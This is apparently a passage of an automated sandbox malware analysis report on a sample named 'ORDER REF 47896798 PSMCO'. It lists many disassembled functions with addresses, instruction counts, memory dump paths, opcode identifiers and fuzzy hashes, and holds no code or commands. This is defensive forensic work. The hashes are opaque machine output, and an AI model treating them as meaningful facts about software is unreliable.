                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8649235fe5d404973a62669b336d739888978e22f15c37110a06b80a8d3bb634
                                                                                            • Instruction ID: b0ba7e16e08977c7273112965706df85f478353de9d26805fa123e1536334f36
                                                                                            • Opcode Fuzzy Hash: 8649235fe5d404973a62669b336d739888978e22f15c37110a06b80a8d3bb634
                                                                                            • Instruction Fuzzy Hash: 1041B3726047469FD320EF68C840A7AB7E9FFC8704F18461DF99997690E730E909C7A6
                                                                                            Function 01904859 Relevance: .1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7093ff639b7ac96700e50b9b99cc23ff753ee36ba6f2b9cd20794175c77b57a7
                                                                                            • Instruction ID: 37a3fe98bf8da9fcd06fb9018ba1dc175ac903865150a7adf08dbfa532f4f9c2
                                                                                            • Opcode Fuzzy Hash: 7093ff639b7ac96700e50b9b99cc23ff753ee36ba6f2b9cd20794175c77b57a7
                                                                                            • Instruction Fuzzy Hash: C741B2706043029FD726DF18D884B26BBE9EF80B51F14483DEA698B2E1D730D941CB51
                                                                                            Function 018F8B50 Relevance: .1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e05d0a950c93165d70b60d310be7d952582db59367053eedd44e57cde2dd58de
                                                                                            • Instruction ID: b3125d538f74ceebd60a133387e053ff707d96eef1b14e74ae88e520f0bb5ad7
                                                                                            • Opcode Fuzzy Hash: e05d0a950c93165d70b60d310be7d952582db59367053eedd44e57cde2dd58de
                                                                                            • Instruction Fuzzy Hash: A4417171A01609CFCB55DF69C980A9DB7F1FF89324F24862ED66AE7290D734AA41CB40
                                                                                            Function 019102E1 Relevance: .1, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                            • Instruction ID: fda340e7dea6fbae2f5b5bcb7c548d7c053cdea0d40b1fc25bd9d587361a016d
                                                                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                            • Instruction Fuzzy Hash: 3F312831A04248AFDB128B68CC40BDBBFEDAF54350F0845A5F85DD739AD67499C5CBA0
                                                                                            Function 019AE3DB Relevance: .1, Instructions: 105COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f857f6d1b1b77aaadc0f4eb403aa5aea6fe666598538e0d6db3e274b6411339
                                                                                            • Instruction ID: 4d3097b106f513179d0c3d9691b024c3ec71c76089a4d5cdc7ba4d3e07e7a707
                                                                                            • Opcode Fuzzy Hash: 9f857f6d1b1b77aaadc0f4eb403aa5aea6fe666598538e0d6db3e274b6411339
                                                                                            • Instruction Fuzzy Hash: 7E31D93574071AABD722DF558C41FAB7AFDAB98F50F510028FA08AB295DAA4DD04C7E0
                                                                                            Function 019B4B4B Relevance: .1, Instructions: 104COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a29f694399db2616b7fe2f8f8509232195b5c1b96ea0f279db5a0f6094707a21
                                                                                            • Instruction ID: d94d73fbd25fc66120c4f4e51fc61c9393029e8197169bd29a80d9a1257630d5
                                                                                            • Opcode Fuzzy Hash: a29f694399db2616b7fe2f8f8509232195b5c1b96ea0f279db5a0f6094707a21
                                                                                            • Instruction Fuzzy Hash: 7231D6326092119FC321DF1DD9C0EAA77F9FB80760F15446DE99A8B256D730E840DB91
                                                                                            Function 01904260 Relevance: .1, Instructions: 102COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c971e56a4d69ae7812911a0995981591ab636df5a58311cd83a2d17d89b8a2e4
                                                                                            • Instruction ID: 7f98f31f559ae9de68ff93cae7dbb592ba0124da508839c3829f4dd2bd0f51dd
                                                                                            • Opcode Fuzzy Hash: c971e56a4d69ae7812911a0995981591ab636df5a58311cd83a2d17d89b8a2e4
                                                                                            • Instruction Fuzzy Hash: 1A41CC71200B45DFD722CF68C985F96BBE8AF49714F05882DE69D8B290C734E844CBA0
                                                                                            Function 019B4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 34ee4283be1d0871f0bdf81a601811f529d724f0fbe1ccc370ee1dde98d825eb
                                                                                            • Instruction ID: 13ee748d472cbd6c37fddb4c56cd7b11e187b68164e6f03fc39ee379c8d215e7
                                                                                            • Opcode Fuzzy Hash: 34ee4283be1d0871f0bdf81a601811f529d724f0fbe1ccc370ee1dde98d825eb
                                                                                            • Instruction Fuzzy Hash: 49317071A043019FD720DF28C9C0EAAB7E5FBC4B10F15496DE99A9B296D730E804DB91
                                                                                            Function 0197EB1D Relevance: .1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 537474247aa919d001ff2c07c986a1d9f97cf026bcdb221eae5ba02a099064dd
                                                                                            • Instruction ID: 3317193d642aeaef5c571258debe10bfcf4c0fcaaa594b51fdea53c158d3e063
                                                                                            • Opcode Fuzzy Hash: 537474247aa919d001ff2c07c986a1d9f97cf026bcdb221eae5ba02a099064dd
                                                                                            • Instruction Fuzzy Hash: 9131AF357016869BF326976E8948F257FEDBF81B45F1D00E0AB4D9B6D2DB28D881C230
                                                                                            Function 019C61C3 Relevance: .1, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fbdbbc61a87950188edc46f6d5af377f43c61c66fa4164149db425af2db5bb47
                                                                                            • Instruction ID: 02540ee520fdff26c335608c380f0d311dd5ed0a87fd326606afcc583a905dbe
                                                                                            • Opcode Fuzzy Hash: fbdbbc61a87950188edc46f6d5af377f43c61c66fa4164149db425af2db5bb47
                                                                                            • Instruction Fuzzy Hash: E331E676A0011AABDB15DF98CC40FAEB7BAFB84B40F454169E944EB344D770ED41CB94
                                                                                            Function 019A483A Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 74da626a18d7eaa1ef3d0c534b60fb0c1fc7cb493917db99f580695f1b9ed4c4
                                                                                            • Instruction ID: 4ef9d399055f5611a57728a9f7076a4eac3f0c6ee7cf6f0de438da6802285b58
                                                                                            • Opcode Fuzzy Hash: 74da626a18d7eaa1ef3d0c534b60fb0c1fc7cb493917db99f580695f1b9ed4c4
                                                                                            • Instruction Fuzzy Hash: 2D317236A4012DABCB21DF54DC84BDEBBF9ABD8750F1400A5A50CA7250DB70DE958FD0
                                                                                            Function 0192EB20 Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ae97c9cae2df1f862ba17bd4beacec31b0423c2e60c2c35be7dbd799a5904a1d
                                                                                            • Instruction ID: 7f568a09f1acbb919b46621b04e331cfaee1dc734254ff30ce8c7a01ed55f6b5
                                                                                            • Opcode Fuzzy Hash: ae97c9cae2df1f862ba17bd4beacec31b0423c2e60c2c35be7dbd799a5904a1d
                                                                                            • Instruction Fuzzy Hash: EA31B776E00629AFDB21DFA9C880EAEBBFDEF54750F114425E919D7254D3709E008BA0
                                                                                            Function 019C60B8 Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 80c714be15ae484c0ec084eaee58f62a66a645067529c20cd34aef275fb53231
                                                                                            • Instruction ID: f9dd1ad0cef74b0f0853a5ce3ecbfee19ad4a585752ab27879d0ab17754f0d5c
                                                                                            • Opcode Fuzzy Hash: 80c714be15ae484c0ec084eaee58f62a66a645067529c20cd34aef275fb53231
                                                                                            • Instruction Fuzzy Hash: 5031D471A00606AFDB12DFA9C850B6AB7B9BFC4B55F11006DE54DDB342DA70DD018B91
                                                                                            Function 019007AF Relevance: .1, Instructions: 95COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aa0b7225a9fc419be4720d14887644e5264e60788082cffd6b34ec0b03e80fbc
                                                                                            • Instruction ID: c89b897bf651f74e4750a6c68797be32ec3c78193ebf0052ec4801161c9970cf
                                                                                            • Opcode Fuzzy Hash: aa0b7225a9fc419be4720d14887644e5264e60788082cffd6b34ec0b03e80fbc
                                                                                            • Instruction Fuzzy Hash: 1B31B332A04616DFC713DE288880E6BBBA5BFD4690F09492DFD5DA7290DB31DD1187D2
                                                                                            Function 01908550 Relevance: .1, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 61e6a76a66df3cc7c8a167df6727cac7a1a2bc15a0d6691519e689fa83bcdf5c
                                                                                            • Instruction ID: 9cc3cec24ac5e9fbd062e178a0f581b6d04cc7134c77f4abadbc23807af36619
                                                                                            • Opcode Fuzzy Hash: 61e6a76a66df3cc7c8a167df6727cac7a1a2bc15a0d6691519e689fa83bcdf5c
                                                                                            • Instruction Fuzzy Hash: 40318D71A093019FE721CF19C840B2ABBE9FB98700F1549ADE98897391D775E944CBA1
                                                                                            Function 0193A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                            • Instruction ID: d2440099592a906dce4a49484393f832d3304f3f5cfec32c137d27e5ccc10dd8
                                                                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                            • Instruction Fuzzy Hash: 29312E72B00B01AFE761CF69DD81B57BBF8BF48650F04092DA59FC3650E630E9008B50
                                                                                            Function 019AEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3754a07dee799b1a3af4f2e26f43d3ee91a0541a40509ac328ac4d05fe1dc562
                                                                                            • Instruction ID: 5e0d152ab2a47286d559e5bf3702f9f9046e293ab89d784b3e8f35b95c1a4857
                                                                                            • Opcode Fuzzy Hash: 3754a07dee799b1a3af4f2e26f43d3ee91a0541a40509ac328ac4d05fe1dc562
                                                                                            • Instruction Fuzzy Hash: 32319A71A093029FCB11DF19C54095ABBF5FFC9619F8449AEE48C9B251E330EA48CBD2
                                                                                            Function 0192438F Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8faab99ae0ae82fd3c2fcb2ea1542cab3dfb7c0b3f9a47d27d43fba5ed5144ed
                                                                                            • Instruction ID: 00149ee51050afdde273a4d65fe455aa07c30fbb39f998abe8899ad675457e9d
                                                                                            • Opcode Fuzzy Hash: 8faab99ae0ae82fd3c2fcb2ea1542cab3dfb7c0b3f9a47d27d43fba5ed5144ed
                                                                                            • Instruction Fuzzy Hash: 5E31E572B006169FD720DFB8C980E6EBBF9AF94704F008529D54AD7658E730ED41CB91
                                                                                            Function 018FCB7E Relevance: .1, Instructions: 89COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                            • Instruction ID: 08bd452db51bd65c049949f70aba15607b9fb0fec21fb7a23080e44fe8310ad8
                                                                                            • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                            • Instruction Fuzzy Hash: 0A212836E4025FAADB10DBB98811BAFBBB9AF54744F0585399E59F7340E370CA00C7A4
                                                                                            Function 018FC156 Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 703a0d6d8e73c79821823c7208e8984fbe270ab6a7de64f0e22e4cb0d13e0a8b
                                                                                            • Instruction ID: 6c3c4d4395bfea3342a4c68720d00ff125e0e60474e25c636534cb96b527400c
                                                                                            • Opcode Fuzzy Hash: 703a0d6d8e73c79821823c7208e8984fbe270ab6a7de64f0e22e4cb0d13e0a8b
                                                                                            • Instruction Fuzzy Hash: 0F3139B25012019BD731EF68CC40B6977F8AF90314F5481ADDD8DAB386EA34D982CBA0
                                                                                            Function 019BC3CD Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                            • Instruction ID: a8d0565a4c5330899d22bb3972903a40ac2c0267ab9e29eb0e668f5c0c60c388
                                                                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                            • Instruction Fuzzy Hash: F421423A60065677CB15AB958D40FFBBBB5EFC0B11F40841EFA6D87651E638DA40C360
                                                                                            Function 018FE420 Relevance: .1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 920d3b94b6c9c80cc2919a214398c508ac2303a6234636877efc356dae8dbee9
                                                                                            • Instruction ID: 57d10f72cf7420abe9c116f44804b4d7252f5eb1488f48c94232c81fb0bafbb9
                                                                                            • Opcode Fuzzy Hash: 920d3b94b6c9c80cc2919a214398c508ac2303a6234636877efc356dae8dbee9
                                                                                            • Instruction Fuzzy Hash: 1B31C431A4151C9BDB319F18CC81FEE77B9AB65750F0200A9E749E72A0E674AF808F90
                                                                                            Function 01934588 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                            • Instruction ID: 270a142d9198c6f0e2ebdfedcf3d6ddfcc99116f8d663d7debecc74a6fde01cc
                                                                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                            • Instruction Fuzzy Hash: 75218635A00609EFCB15CF58C984A8EBBF9FF88714F1180A5EE199F241D671EE45DB90
                                                                                            Function 019344B0 Relevance: .1, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 927f895637cd97ae77feb68619f865261d17570e44fb4109d833ad9af0b5d608
                                                                                            • Instruction ID: c08d354eefe3fca8d7f6ec4dc9370aae17daa9a76c5d772cff04d0276e4ff378
                                                                                            • Opcode Fuzzy Hash: 927f895637cd97ae77feb68619f865261d17570e44fb4109d833ad9af0b5d608
                                                                                            • Instruction Fuzzy Hash: 1B21A072A047459BC722DE18C840B6B7BE8FBC8761F014919F9599B685D730E9018BA2
                                                                                            Function 018FE388 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                            • Instruction ID: c8764b81e43a3cd45ad61d2dcea19a8ffc8870753bffa3dd2abe3221a13d8cb1
                                                                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                            • Instruction Fuzzy Hash: 77316B31600A09EFD721CB68C984F6AB7F9FF85354F1145A9E656DB2A0E730EE41CB50
                                                                                            Function 0197E609 Relevance: .1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ec5816958fbfc758a14e9be62e85b03c90defdc2622616526ee9ecb6672e0df4
                                                                                            • Instruction ID: 8c5a08514a808904fe54638102c7c66dd0b6bac5356f230d02070f05a59888a9
                                                                                            • Opcode Fuzzy Hash: ec5816958fbfc758a14e9be62e85b03c90defdc2622616526ee9ecb6672e0df4
                                                                                            • Instruction Fuzzy Hash: 04316B79A00206EFCB15DF1CC884DAEB7BAFF88704B154499F8099B391E771EA50CB94
                                                                                            Function 019806F1 Relevance: .1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 25a673a031ccca150bb8504fc319b7f6ecb11cfd46b1adb6d3c7add24c691013
                                                                                            • Instruction ID: e5b127a541f7d9ef934b950e445d791d296fce055d294716c7ebd392ee04abe0
                                                                                            • Opcode Fuzzy Hash: 25a673a031ccca150bb8504fc319b7f6ecb11cfd46b1adb6d3c7add24c691013
                                                                                            • Instruction Fuzzy Hash: 8C21B175900129ABCF10EF59C881ABEB7F8FF48740B550069F945E7250D738AE41CBA1
                                                                                            Function 0198019F Relevance: .1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fc774930a0f1f24522d1ca25ed88f21c53fa83f72f433a4514114721ac33029f
                                                                                            • Instruction ID: 416b6a8fcc5a39c412af8f6b23471440903f9789dc1503fab18e3c4982ba11cb
                                                                                            • Opcode Fuzzy Hash: fc774930a0f1f24522d1ca25ed88f21c53fa83f72f433a4514114721ac33029f
                                                                                            • Instruction Fuzzy Hash: C1219C75A00645BFD715EBADD840F6AB7B8FF88750F180169F908D76A0D634ED40CBA4
                                                                                            Function 01980283 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9df15de03088dbf6c6dfd837c3072cfed16e4c28be6ec6ffe9e9f8d3b9310bdb
                                                                                            • Instruction ID: c02c6009b132607df47dc6bba52a4f280b3a0bd20f54b88e3aba1979eba4da07
                                                                                            • Opcode Fuzzy Hash: 9df15de03088dbf6c6dfd837c3072cfed16e4c28be6ec6ffe9e9f8d3b9310bdb
                                                                                            • Instruction Fuzzy Hash: 5D21B0729043469BD711FF5AC844F5BBBECAFE1650F0C0456BD88C7251D774DA48C6A2
                                                                                            Function 01922835 Relevance: .1, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 918e9f8d419893c3bca978d4bc3829dc04708e494825be4478edf77720373515
                                                                                            • Instruction ID: f2a0510358e63874f164411f4d4e83c0997de4505440326a5876c675940728c5
                                                                                            • Opcode Fuzzy Hash: 918e9f8d419893c3bca978d4bc3829dc04708e494825be4478edf77720373515
                                                                                            • Instruction Fuzzy Hash: D4213E317046959BE322972C8C14F147B9DAF41775F190364FA2CAF6D6D7A8C841C221
